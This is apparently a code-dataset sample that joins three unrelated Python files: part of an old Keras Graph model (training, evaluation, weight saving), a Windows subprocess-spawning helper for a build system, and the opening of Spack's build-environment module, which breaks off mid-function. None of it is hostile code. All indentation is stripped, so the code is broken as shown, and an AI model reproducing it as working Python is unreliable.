if len(self.output_order) == 1:
y = ys[0]
y_train = ys_train[0]
y_test = ys_test[0]
# set class_mode, for accuracy computation:
if self.outputs[self.output_order[0]].output_shape[-1] == 1:
class_mode = 'binary'
else:
class_mode = 'categorical'
self.class_mode = class_mode
if class_mode == 'categorical':
train_accuracy = K.mean(K.equal(K.argmax(y, axis=-1),
K.argmax(y_train, axis=-1)))
test_accuracy = K.mean(K.equal(K.argmax(y, axis=-1),
K.argmax(y_test, axis=-1)))
elif class_mode == 'binary':
is_categorical_xent = False
loss_type = loss[self.output_order[0]]
if loss_type == 'categorical_crossentropy':
is_categorical_xent = True
if hasattr(loss_type, '__name__') and loss_type.__name__ == 'categorical_crossentropy':
is_categorical_xent = True
if is_categorical_xent:
warnings.warn('Your model output has shape ' + str(self.output_shape) +
' (1-dimensional features), but you are using ' +
' the `categorical_crossentropy` loss. You ' +
'almost certainly want to use `binary_crossentropy` instead.')
train_accuracy = K.mean(K.equal(y, K.round(y_train)))
test_accuracy = K.mean(K.equal(y, K.round(y_test)))
else:
self.class_mode = None
ins = [self.inputs[name].input for name in self.input_order]
train_ins = ins + ys + weights
test_ins = ins + ys + weights
for r in self.regularizers:
train_loss = r(train_loss)
self.optimizer = optimizers.get(optimizer)
updates = self.optimizer.get_updates(self.trainable_weights,
self.constraints,
train_loss)
updates += self.updates
self.loss = loss
self._train = K.function(train_ins, [train_loss],
updates=updates, **kwargs)
if self.class_mode:
self._train_with_acc = K.function(train_ins, [train_loss, train_accuracy],
updates=updates, **kwargs)
self._test = K.function(test_ins, [test_loss],
updates=self.state_updates, **kwargs)
if self.class_mode:
self._test_with_acc = K.function(test_ins, [test_loss, test_accuracy],
updates=self.state_updates, **kwargs)
self._predict = K.function(inputs=ins, outputs=ys_test,
updates=self.state_updates, **kwargs)
def fit(self, data, batch_size=128, nb_epoch=100, verbose=1, callbacks=[],
validation_split=0., validation_data=None, shuffle=True,
show_accuracy=False,
class_weight={}, sample_weight={}):
'''Train the model for a fixed number of epochs.
Returns a history object. Its `history` attribute is a record of
training loss values at successive epochs,
as well as validation loss values (if applicable).
# Arguments
data: dictionary mapping input names and outputs names to
appropriate numpy arrays. All arrays should contain
the same number of samples.
batch_size: int. Number of samples per gradient update.
nb_epoch: int.
verbose: 0 for no logging to stdout,
1 for progress bar logging, 2 for one log line per epoch.
callbacks: `keras.callbacks.Callback` list. List of callbacks
to apply during training. See [callbacks](callbacks.md).
validation_split: float (0. < x < 1). Fraction of the data to
use as held-out validation data.
validation_data: dictionary mapping input names and outputs names
to appropriate numpy arrays to be used as
held-out validation data.
All arrays should contain the same number of samples.
Will override validation_split.
shuffle: boolean. Whether to shuffle the samples at each epoch.
show_accuracy: whether to log accuracy.
Can only be used if your Graph has a single output (otherwise "accuracy"
is ill-defined).
class_weight: dictionary mapping output names to
class weight dictionaries.
sample_weight: dictionary mapping output names to
numpy arrays of sample weights.
'''
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
X = [data[name] for name in self.input_order]
y = [standardize_y(data[name]) for name in self.output_order]
if len(set([len(a) for a in X] + [len(a) for a in y])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
sample_weight_list = [standardize_weights(y[i],
sample_weight=sample_weight.get(self.output_order[i]),
sample_weight_mode=self.sample_weight_modes.get(self.output_order[i])) for i in range(len(self.output_order))]
class_weight_list = [class_weight.get(name) for name in self.output_order]
val_f = None
val_ins = None
if validation_data or validation_split:
val_f = self._test
if validation_data:
# can't use sample weights with validation data at this point
y_val = [standardize_y(validation_data[name]) for name in self.output_order]
sample_weight = [standardize_weights(y_val[i]) for i in range(len(y_val))]
val_ins = [validation_data[name] for name in self.input_order] + [standardize_y(validation_data[name]) for name in self.output_order] + sample_weight
elif 0 < validation_split < 1:
split_at = int(len(X[0]) * (1 - validation_split))
X, X_val = (slice_X(X, 0, split_at), slice_X(X, split_at))
y, y_val = (slice_X(y, 0, split_at), slice_X(y, split_at))
sample_weight_list, sample_weight_list_val = (slice_X(sample_weight_list, 0, split_at), slice_X(sample_weight_list, split_at))
val_ins = X_val + y_val + sample_weight_list_val
if self.class_mode and show_accuracy:
f = self._train_with_acc
out_labels = ['loss', 'acc']
metrics = ['loss', 'acc', 'val_loss', 'val_acc']
else:
f = self._train
out_labels = ['loss']
metrics = ['loss', 'val_loss']
sample_weight_list = [standardize_weights(y[i],
sample_weight=sample_weight_list[i],
class_weight=class_weight_list[i],
sample_weight_mode=self.sample_weight_modes.get(self.output_order[i])) for i in range(len(self.output_order))]
ins = X + y + sample_weight_list
history = self._fit(f, ins, out_labels=out_labels,
batch_size=batch_size, nb_epoch=nb_epoch,
verbose=verbose, callbacks=callbacks,
val_f=val_f, val_ins=val_ins,
shuffle=shuffle, metrics=metrics)
return history
def evaluate(self, data, batch_size=128, show_accuracy=False,
verbose=0, sample_weight={}):
'''Compute the loss on some input data, batch by batch.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `show_accuracy=True`.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
fn = self._test_with_acc
else:
fn = self._test
outs = self._test_loop(fn, ins, batch_size, verbose)
if show_accuracy:
return outs
else:
return outs[0]
def predict(self, data, batch_size=128, verbose=0):
'''Generate output predictions for the input samples
batch by batch.
Arguments: see `fit` method.
'''
ins = [data[name] for name in self.input_order]
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
outs = self._predict_loop(self._predict, ins, batch_size, verbose)
return dict(zip(self.output_order, outs))
def train_on_batch(self, data, accuracy=False,
class_weight={}, sample_weight={}):
'''Single gradient update on a batch of samples.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
class_weight=class_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
return self._train_with_acc(ins)
return self._train(ins)
def test_on_batch(self, data, accuracy=False, sample_weight={}):
'''Test the network on a single batch of samples.
If `accuracy`, it returns a tuple `(loss, accuracy)`,
otherwise it returns the loss value.
Arguments: see `fit` method.
'''
sample_weight = [standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order]
ins = [data[name] for name in self.input_order] + [standardize_y(data[name]) for name in self.output_order] + sample_weight
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
if accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
return self._test_with_acc(ins)
return self._test(ins)
def predict_on_batch(self, data):
'''Generate predictions for a single batch of samples.
'''
ins = [data[name] for name in self.input_order]
if len(set([len(a) for a in ins])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
outs = self._predict(ins)
return dict(zip(self.output_order, outs))
def save_weights(self, filepath, overwrite=False):
'''Save weights from all layers to a HDF5 files.
'''
import h5py
import os.path
# if file exists and should not be overwritten
if not overwrite and os.path.isfile(filepath):
import sys
get_input = input
if sys.version_info[:2] <= (2, 7):
get_input = raw_input
overwrite = get_input('[WARNING] %s already exists - overwrite? '
'[y/n]' % (filepath))
while overwrite not in ['y', 'n']:
overwrite = get_input('Enter "y" (overwrite) or "n" (cancel).')
if overwrite == 'n':
return
print('[TIP] Next time specify overwrite=True in save_weights!')
f = h5py.File(filepath, 'w')
g = f.create_group('graph')
weights = self.get_weights()
g.attrs['nb_params'] = len(weights)
for n, param in enumerate(weights):
param_name = 'param_{}'.format(n)
param_dset = g.create_dataset(param_name, param.shape,
dtype=param.dtype)
param_dset[:] = param
f.flush()
f.close()
def load_weights(self, filepath):
'''Load weights from a HDF5 file.
'''
import h5py
f = h5py.File(filepath, mode='r')
g = f['graph']
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
self.set_weights(weights)
f.close()
def evaluate_generator(self, generator, nb_val_samples, show_accuracy=False,
verbose=1, **kwargs):
'''Evaluates the model on a generator. The generator should
return the same kind of data with every yield as accepted
by `evaluate`.
If `show_accuracy`, it returns a tuple `(loss, accuracy)`,
otherwise it returns the loss value.
Arguments:
generator:
generator yielding dictionaries of the kind accepted
by `evaluate`, or tuples of such dictionaries and
associated dictionaries of sample weights.
nb_val_samples:
total number of samples to generate from `generator`
to use in validation.
show_accuracy: whether to log accuracy.
Can only be used if your Graph has a single output (otherwise "accuracy"
is ill-defined).
Other arguments are the same as for `fit`.
'''
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
done_samples = 0
all_outs = None
weights = []
q, _stop = generator_queue(generator, **kwargs)
while done_samples < nb_val_samples:
data, sample_weight = self._check_generator_output(q.get(), _stop)
do_samples = len(data[next(iter(data.keys()))])
outs = self.evaluate(data, batch_size=do_samples,
sample_weight=sample_weight,
show_accuracy=show_accuracy,
verbose=verbose)
if show_accuracy:
if all_outs is None:
all_outs = [[] for _ in outs]
for ox, out in enumerate(outs):
all_outs[ox].append(out)
else:
if all_outs is None:
all_outs = []
all_outs.append(outs)
done_samples += do_samples
weights.append(do_samples)
_stop.set()
if show_accuracy:
return [np.average(outx, weights=weights)
for outx in all_outs]
else:
return np.average(np.asarray(all_outs),
weights=weights)
def _check_generator_output(self, generator_output, stop):
'''Verifies the output of a generator to make sure
it is consistent with requirements. Also standardizes
the output.
'''
if type(generator_output) in [list, tuple]:
if len(generator_output) == 2:
data, sample_weight = generator_output
else:
stop.set()
raise Exception('The generator output tuple must have '
'2 dictionary elements: '
'(data, sample_weight).')
elif type(generator_output) == dict:
data = generator_output
sample_weight = {}
else:
stop.set()
raise Exception('The generator output must be '
'a data dictionary or a tuple '
'(data, sample_weight).')
assert type(data) == dict
assert type(sample_weight) == dict
if len(set([len(data[name]) for name in data.keys()] +
[len(sample_weight[name]) for name in sample_weight.keys()])) != 1:
raise Exception('All input arrays and target arrays must have '
'the same number of samples.')
sample_weight = {name: standardize_weights(data[name],
sample_weight=sample_weight.get(name),
sample_weight_mode=self.sample_weight_modes.get(name)) for name in self.output_order}
return data, sample_weight
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
verbose=1, show_accuracy=False, callbacks=[],
validation_data=None, nb_val_samples=None,
class_weight={},
nb_worker=1, nb_val_worker=None):
'''Fit a model on data generated batch-by-batch by a Python generator.
The generator is run in parallel to the model, for efficiency,
and can be run by multiple workers at the same time.
For instance, this allows you to do real-time data augmentation
on images on CPU in parallel to training your model on GPU.
# Arguments
generator: a generator.
The output of the generator must be either a dictionary
mapping inputs and outputs names to numpy arrays, or
a tuple of dictionaries (input_data, sample_weight).
All arrays should contain the same number of samples.
The generator is expected to loop over its data
indefinitely. An epoch finishes when `samples_per_epoch`
samples have been seen by the model.
samples_per_epoch: integer, number of samples to process before
going to the next epoch.
nb_epoch: integer, total number of iterations on the data.
verbose: verbosity mode, 0, 1, or 2.
show_accuracy: whether to log accuracy.
Can only be used if your Graph has a single output (otherwise "accuracy"
is ill-defined).
callbacks: list of callbacks to be called during training.
validation_data: dictionary mapping input names and outputs names
to appropriate numpy arrays to be used as
held-out validation data, or a generator yielding such
dictionaries. All arrays should contain the same number
of samples. If a generator, will be called until more than
`nb_val_samples` examples have been generated at the
end of every epoch. These examples will then be used
as the validation data.
nb_val_samples: number of samples to use from validation
generator at the end of every epoch.
class_weight: dictionary mapping class indices to a weight
for the class.
nb_worker: integer, number of workers to use for running
the generator (in parallel to model training).
If using multiple workers, the processing order of batches
generated by the model will be non-deterministic.
If using multiple workers, make sure to protect
any thread-unsafe operation done by the generator
using a Python mutex.
nb_val_worker: same as `nb_worker`, except for validation data.
Has no effect if no validation data or validation data is
not a generator. If `None`, defaults to nb_worker.
# Returns
A `History` object.
# Examples
```python
def generate_arrays_from_file(path):
while 1:
f = open(path)
for line in f:
# create numpy arrays of input data
# and labels, from each line in the file
x1, x2, y = process_line(line)
yield {'input_1': x1, 'input_2': x2, 'output': y}
f.close()
graph.fit_generator(generate_arrays_from_file('/my_file.txt'),
samples_per_epoch=10000, nb_epoch=10)
```
'''
max_data_q_size = 10 # maximum number of batches in queue
wait_time = 0.05 # in seconds
epoch = 0
do_validation = bool(validation_data)
val_gen = (hasattr(validation_data, 'next') or
hasattr(validation_data, '__next__'))
if val_gen and not nb_val_samples:
raise Exception('When using a generator for validation data, '
'you must specify a value for "nb_val_samples".')
if nb_val_worker is None:
nb_val_worker = nb_worker
if show_accuracy:
if len(self.output_order) != 1:
raise Exception('In a Graph model, "show_accuracy" can only '
'be used if your Graph has exactly one output.'
' Otherwise accuracy is ill-defined.')
out_labels = ['loss', 'acc']
metrics = ['loss', 'acc', 'val_loss', 'val_acc']
else:
out_labels = ['loss']
metrics = ['loss', 'val_loss']
if not class_weight:
class_weight = {}
# prepare callbacks
self.history = cbks.History()
callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
if verbose:
callbacks += [cbks.ProgbarLogger()]
callbacks = cbks.CallbackList(callbacks)
callbacks._set_model(self)
callbacks._set_params({
'nb_epoch': nb_epoch,
'nb_sample': samples_per_epoch,
'verbose': verbose,
'do_validation': do_validation,
'metrics': metrics,
})
callbacks.on_train_begin()
# start generator thread storing batches into a queue
data_gen_queue, _data_stop = generator_queue(generator, max_q_size=max_data_q_size,
wait_time=wait_time, nb_worker=nb_worker)
if do_validation and not val_gen:
# TODO: _data_stop not really sensical here
data_val, sample_weight_val = self._check_generator_output(validation_data, _data_stop)
sample_weight_val_l = [sample_weight_val[name] for name in self.output_order]
y_val = [standardize_y(data_val[name]) for name in self.output_order]
self.validation_data = [data_val[name] for name in self.input_order] + y_val + sample_weight_val_l
else:
self.validation_data = None
self.stop_training = False
while epoch < nb_epoch:
callbacks.on_epoch_begin(epoch)
samples_seen = 0
batch_index = 0
while samples_seen < samples_per_epoch:
while not _data_stop.is_set():
if not data_gen_queue.empty():
generator_output = data_gen_queue.get()
break
else:
time.sleep(wait_time)
data, sample_weight = self._check_generator_output(generator_output,
_data_stop)
batch_logs = {}
batch_size = len(data[list(data.keys())[0]])
batch_logs['batch'] = batch_index
batch_logs['size'] = batch_size
callbacks.on_batch_begin(batch_index, batch_logs)
outs = self.train_on_batch(data,
sample_weight=sample_weight,
class_weight=class_weight,
accuracy=show_accuracy)
if type(outs) != list:
outs = [outs]
for l, o in zip(out_labels, outs):
batch_logs[l] = o
callbacks.on_batch_end(batch_index, batch_logs)
# construct epoch logs
epoch_logs = {}
batch_index += 1
samples_seen += batch_size
# epoch finished
if samples_seen >= samples_per_epoch and do_validation:
if val_gen:
val_outs = self.evaluate_generator(validation_data,
nb_val_samples,
verbose=0,
show_accuracy=show_accuracy,
nb_worker=nb_val_worker,
wait_time=wait_time)
else:
val_outs = self.evaluate(data_val,
sample_weight=sample_weight_val,
show_accuracy=show_accuracy,
verbose=0)
if type(val_outs) != list:
val_outs = [val_outs]
# same labels assumed
for l, o in zip(out_labels, val_outs):
epoch_logs['val_' + l] = o
callbacks.on_epoch_end(epoch, epoch_logs)
epoch += 1
if self.stop_training:
break
_data_stop.set()
callbacks.on_train_end()
return self.history
|
win32spawn.py | #
# File : win32spawn.py
# This file is part of CMCC IOT OS
# COPYRIGHT (C) 2012-2020, CMCC IOT
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
#
import os
import threading
import Queue
# Windows import
import win32file
import win32pipe
import win32api
import win32con
import win32security
import win32process
import win32event
class Win32Spawn(object):
def __init__(self, cmd, shell=False):
self.queue = Queue.Queue()
self.is_terminated = False
self.wake_up_event = win32event.CreateEvent(None, 0, 0, None)
exec_dir = os.getcwd()
comspec = os.environ.get("COMSPEC", "cmd.exe")
cmd = comspec + ' /c ' + cmd
win32event.ResetEvent(self.wake_up_event)
currproc = win32api.GetCurrentProcess()
sa = win32security.SECURITY_ATTRIBUTES()
sa.bInheritHandle = 1
child_stdout_rd, child_stdout_wr = win32pipe.CreatePipe(sa, 0)
child_stdout_rd_dup = win32api.DuplicateHandle(currproc, child_stdout_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdout_rd)
child_stderr_rd, child_stderr_wr = win32pipe.CreatePipe(sa, 0)
child_stderr_rd_dup = win32api.DuplicateHandle(currproc, child_stderr_rd, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stderr_rd)
child_stdin_rd, child_stdin_wr = win32pipe.CreatePipe(sa, 0)
child_stdin_wr_dup = win32api.DuplicateHandle(currproc, child_stdin_wr, currproc, 0, 0, win32con.DUPLICATE_SAME_ACCESS)
win32file.CloseHandle(child_stdin_wr)
startup_info = win32process.STARTUPINFO()
startup_info.hStdInput = child_stdin_rd
startup_info.hStdOutput = child_stdout_wr
startup_info.hStdError = child_stderr_wr
startup_info.dwFlags = win32process.STARTF_USESTDHANDLES
cr_flags = 0
cr_flags = win32process.CREATE_NEW_PROCESS_GROUP
env = os.environ.copy()
self.h_process, h_thread, dw_pid, dw_tid = win32process.CreateProcess(None, cmd, None, None, 1,
cr_flags, env, os.path.abspath(exec_dir),
startup_info)
win32api.CloseHandle(h_thread)
win32file.CloseHandle(child_stdin_rd)
win32file.CloseHandle(child_stdout_wr)
win32file.CloseHandle(child_stderr_wr)
self.__child_stdout = child_stdout_rd_dup
self.__child_stderr = child_stderr_rd_dup
self.__child_stdin = child_stdin_wr_dup
self.exit_code = -1
def close(self):
win32file.CloseHandle(self.__child_stdout)
win32file.CloseHandle(self.__child_stderr)
win32file.CloseHandle(self.__child_stdin)
win32api.CloseHandle(self.h_process)
win32api.CloseHandle(self.wake_up_event)
def kill_subprocess():
win32event.SetEvent(self.wake_up_event)
def sleep(secs):
win32event.ResetEvent(self.wake_up_event)
timeout = int(1000 * secs)
val = win32event.WaitForSingleObject(self.wake_up_event, timeout)
if val == win32event.WAIT_TIMEOUT:
return True
else:
# The wake_up_event must have been signalled
return False
def get(self, block=True, timeout=None):
return self.queue.get(block=block, timeout=timeout)
def qsize(self):
return self.queue.qsize()
def __wait_for_child(self):
# kick off threads to read from stdout and stderr of the child process
threading.Thread(target=self.__do_read, args=(self.__child_stdout, )).start()
threading.Thread(target=self.__do_read, args=(self.__child_stderr, )).start()
while True:
# block waiting for the process to finish or the interrupt to happen
handles = (self.wake_up_event, self.h_process)
val = win32event.WaitForMultipleObjects(handles, 0, win32event.INFINITE)
if val >= win32event.WAIT_OBJECT_0 and val < win32event.WAIT_OBJECT_0 + len(handles):
handle = handles[val - win32event.WAIT_OBJECT_0]
if handle == self.wake_up_event:
win32api.TerminateProcess(self.h_process, 1)
win32event.ResetEvent(self.wake_up_event)
return False
elif handle == self.h_process:
# the process has ended naturally
return True
else:
assert False, "Unknown handle fired"
else:
assert False, "Unexpected return from WaitForMultipleObjects"
# Wait for job to finish. Since this method blocks, it can to be called from another thread.
# If the application wants to kill the process, it should call kill_subprocess().
def wait(self):
if not self.__wait_for_child():
# it's been killed
result = False
else:
# normal termination
self.exit_code = win32process.GetExitCodeProcess(self.h_process)
result = self.exit_code == 0
self.close()
self.is_terminated = True
return result
# This method gets called on a worker thread to read from either a stderr
# or stdout thread from the child process.
def __do_read(self, handle):
bytesToRead = 1024
while 1:
try:
finished = 0
hr, data = win32file.ReadFile(handle, bytesToRead, None)
if data:
self.queue.put_nowait(data)
except win32api.error:
finished = 1
if finished:
return
def start_pipe(self):
def worker(pipe):
return pipe.wait()
thrd = threading.Thread(target=worker, args=(self, ))
thrd.start()
|
build_environment.py | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
This module contains all routines related to setting up the package
build environment. All of this is set up by package.py just before
install() is called.
There are two parts to the build environment:
1. Python build environment (i.e. install() method)
This is how things are set up when install() is called. Spack
takes advantage of each package being in its own module by adding a
bunch of command-like functions (like configure(), make(), etc.) in
the package's module scope. Ths allows package writers to call
them all directly in Package.install() without writing 'self.'
everywhere. No, this isn't Pythonic. Yes, it makes the code more
readable and more like the shell script from which someone is
likely porting.
2. Build execution environment
This is the set of environment variables, like PATH, CC, CXX,
etc. that control the build. There are also a number of
environment variables used to pass information (like RPATHs and
other information about dependencies) to Spack's compiler wrappers.
All of these env vars are also set up here.
Skimming this module is a nice way to get acquainted with the types of
calls you can make from within the install() function.
"""
import inspect
import multiprocessing
import os
import shutil
import sys
import traceback
import types
from six import StringIO
import llnl.util.tty as tty
from llnl.util.tty.color import cescape, colorize
from llnl.util.filesystem import mkdirp, install, install_tree
from llnl.util.lang import dedupe
import spack.build_systems.cmake
import spack.build_systems.meson
import spack.config
import spack.main
import spack.paths
import spack.schema.environment
import spack.store
from spack.util.string import plural
from spack.util.environment import (
env_flag, filter_system_paths, get_path, is_system_path,
EnvironmentModifications, validate, preserve_environment)
from spack.util.environment import system_dirs
from spack.error import NoLibrariesError, NoHeadersError
from spack.util.executable import Executable
from spack.util.module_cmd import load_module, get_path_from_module, module
from spack.util.log_parse import parse_log_events, make_log_context
#
# This can be set by the user to globally disable parallel builds.
#
SPACK_NO_PARALLEL_MAKE = 'SPACK_NO_PARALLEL_MAKE'
#
# These environment variables are set by
# set_build_environment_variables and used to pass parameters to
# Spack's compiler wrappers.
#
SPACK_ENV_PATH = 'SPACK_ENV_PATH'
SPACK_INCLUDE_DIRS = 'SPACK_INCLUDE_DIRS'
SPACK_LINK_DIRS = 'SPACK_LINK_DIRS'
SPACK_RPATH_DIRS = 'SPACK_RPATH_DIRS'
SPACK_RPATH_DEPS = 'SPACK_RPATH_DEPS'
SPACK_LINK_DEPS = 'SPACK_LINK_DEPS'
SPACK_PREFIX = 'SPACK_PREFIX'
SPACK_INSTALL = 'SPACK_INSTALL'
SPACK_DEBUG = 'SPACK_DEBUG'
SPACK_SHORT_SPEC = 'SPACK_SHORT_SPEC'
SPACK_DEBUG_LOG_ID = 'SPACK_DEBUG_LOG_ID'
SPACK_DEBUG_LOG_DIR = 'SPACK_DEBUG_LOG_DIR'
SPACK_CCACHE_BINARY = 'SPACK_CCACHE_BINARY'
SPACK_SYSTEM_DIRS = 'SPACK_SYSTEM_DIRS'
# Platform-specific library suffix.
dso_suffix = 'dylib' if sys.platform == 'darwin' else 'so'
class MakeExecutable(Executable):
"""Special callable executable object for make so the user can specify
parallelism options on a per-invocation basis. Specifying
'parallel' to the call will override whatever the package's
global setting is, so you can either default to true or false and
override particular calls. Specifying 'jobs_env' to a particular
call will name an environment variable which will be set to the
parallelism level (without affecting the normal invocation with
-j).
Note that if the SPACK_NO_PARALLEL_MAKE env var is set it overrides
everything.
"""
def __init__(self, name, jobs):
super(MakeExecutable, self).__init__(name)
self.jobs = jobs
def __call__(self, *args, **kwargs):
"""parallel, and jobs_env from kwargs are swallowed and used here;
remaining arguments are passed through to the superclass.
"""
disable = env_flag(SPACK_NO_PARALLEL_MAKE)
parallel = (not disable) and kwargs.pop('parallel', self.jobs > 1)
if parallel:
args = ('-j{0}'.format(self.jobs),) + args
jobs_env = kwargs.pop('jobs_env', None)
if jobs_env:
# Caller wants us to set an environment variable to
# control the parallelism.
kwargs['extra_env'] = {jobs_env: str(self.jobs)}
return super(MakeExecutable, self).__call__(*args, **kwargs)
def clean_environment():
# Stuff in here sanitizes the build environment to eliminate
# anything the user has set that may interfere. We apply it immediately
# unlike the other functions so it doesn't overwrite what the modules load.
env = EnvironmentModifications()
# Remove these vars from the environment during build because they
# can affect how some packages find libraries. We want to make
# sure that builds never pull in unintended external dependencies.
env.unset('LD_LIBRARY_PATH')
env.unset('CRAY_LD_LIBRARY_PATH')
env.unset('LIBRARY_PATH')
env.unset('CPATH')
env.unset('LD_RUN_PATH')
env.unset('DYLD_LIBRARY_PATH')
env.unset('DYLD_FALLBACK_LIBRARY_PATH')
# Remove all pkgconfig stuff from craype
for varname in os.environ.keys():
if 'PKGCONF' in varname:
env.unset(varname)
build_lang = spack.config.get('config:build_language')
if build_lang:
# Override language-related variables. This can be used to force
# English compiler messages etc., which allows parse_log_events to
# show useful matches.
env.set('LC_ALL', build_lang)
# Remove any macports installs from the PATH. The macports ld can
# cause conflicts with the built-in linker on el capitan. Solves
# assembler issues, e.g.:
# suffix or operands invalid for `movq'"
path = get_path('PATH')
for p in path:
if '/macports/' in p:
env.remove_path('PATH', p)
env.apply_modifications()
def set_compiler_environment_variables(pkg, env):
assert pkg.spec.concrete
compiler = pkg.compiler
spec = pkg.spec
# Set compiler variables used by CMake and autotools
assert all(key in compiler.link_paths for key in (
'cc', 'cxx', 'f77', 'fc'))
# Populate an object with the list of environment modifications
# and return it
# TODO : add additional kwargs for better diagnostics, like requestor,
# ttyout, ttyerr, etc.
link_dir = spack.paths.build_env_path
# Set SPACK compiler variables so that our wrapper knows what to call
if compiler.cc:
env.set('SPACK_CC', compiler.cc)
env.set('CC', os.path.join(link_dir, compiler.link_paths['cc']))
if compiler.cxx:
env.set('SPACK_CXX', compiler.cxx)
env.set('CXX', os.path.join(link_dir, compiler.link_paths['cxx']))
if compiler.f77:
env.set('SPACK_F77', compiler.f77)
env.set('F77', os.path.join(link_dir, compiler.link_paths['f77']))
if compiler.fc:
env.set('SPACK_FC', compiler.fc)
env.set('FC', os.path.join(link_dir, compiler.link_paths['fc']))
# Set SPACK compiler rpath flags so that our wrapper knows what to use
env.set('SPACK_CC_RPATH_ARG', compiler.cc_rpath_arg)
env.set('SPACK_CXX_RPATH_ARG', compiler.cxx_rpath_arg)
env.set('SPACK_F77_RPATH_ARG', compiler.f77_rpath_arg)
env.set('SPACK_FC_RPATH_ARG', compiler.fc_rpath_arg)
env.set('SPACK_LINKER_ARG', compiler.linker_arg)
# Check whether we want to force RPATH or RUNPATH
if spack.config.get('config:shared_linking') == 'rpath':
env.set('SPACK_DTAGS_TO_STRIP', compiler.enable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.disable_new_dtags)
else:
env.set('SPACK_DTAGS_TO_STRIP', compiler.disable_new_dtags)
env.set('SPACK_DTAGS_TO_ADD', compiler.enable_new_dtags)
# Set the target parameters that the compiler will add
isa_arg = spec.architecture.target.optimization_flags(compiler)
env.set('SPACK_TARGET_ARGS', isa_arg)
# Trap spack-tracked compiler flags as appropriate.
# env_flags are easy to accidentally override.
inject_flags = {}
env_flags = {}
build_system_flags = {}
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Always convert flag_handler to function type.
# This avoids discrepencies in calling conventions between functions
# and methods, or between bound and unbound methods in python 2.
# We cannot effectively convert everything to a bound method, which
# would be the simpler solution.
if isinstance(pkg.flag_handler, types.FunctionType):
handler = pkg.flag_handler
else:
if sys.version_info >= (3, 0):
handler = pkg.flag_handler.__func__
else:
handler = pkg.flag_handler.im_func
injf, envf, bsf = handler(pkg, flag, spec.compiler_flags[flag])
inject_flags[flag] = injf or []
env_flags[flag] = envf or []
build_system_flags[flag] = bsf or []
# Place compiler flags as specified by flag_handler
for flag in spack.spec.FlagMap.valid_compiler_flags():
# Concreteness guarantees key safety here
if inject_flags[flag]:
# variables SPACK_<FLAG> inject flags through wrapper
var_name = 'SPACK_{0}'.format(flag.upper())
env.set(var_name, ' '.join(f for f in inject_flags[flag]))
if env_flags[flag]:
# implicit variables
env.set(flag.upper(), ' '.join(f for f in env_flags[flag]))
pkg.flags_to_build_system_args(build_system_flags)
env.set('SPACK_COMPILER_SPEC', str(spec.compiler))
env.set('SPACK_SYSTEM_DIRS', ':'.join(system_dirs))
compiler.setup_custom_environment(pkg, env)
return env
def set_build_environment_variables(pkg, env, dirty):
"""Ensure a clean install environment when we build packages.
This involves unsetting pesky environment variables that may
affect the build. It also involves setting environment variables
used by Spack's compiler wrappers.
Args:
pkg: The package we are building
env: The build environment
dirty (bool): Skip unsetting the user's environment settings
"""
# Gather information about various types of dependencies
build_deps = set(pkg.spec.dependencies(deptype=('build', 'test')))
link_deps = set(pkg.spec.traverse(root=False, deptype=('link')))
build_link_deps = build_deps | link_deps
rpath_deps = get_rpath_deps(pkg)
link_dirs = []
include_dirs = []
rpath_dirs = []
# The top-level package is always RPATHed. It hasn't been installed yet
# so the RPATHs are added unconditionally (e.g. even though lib64/ may
# not be created for the install).
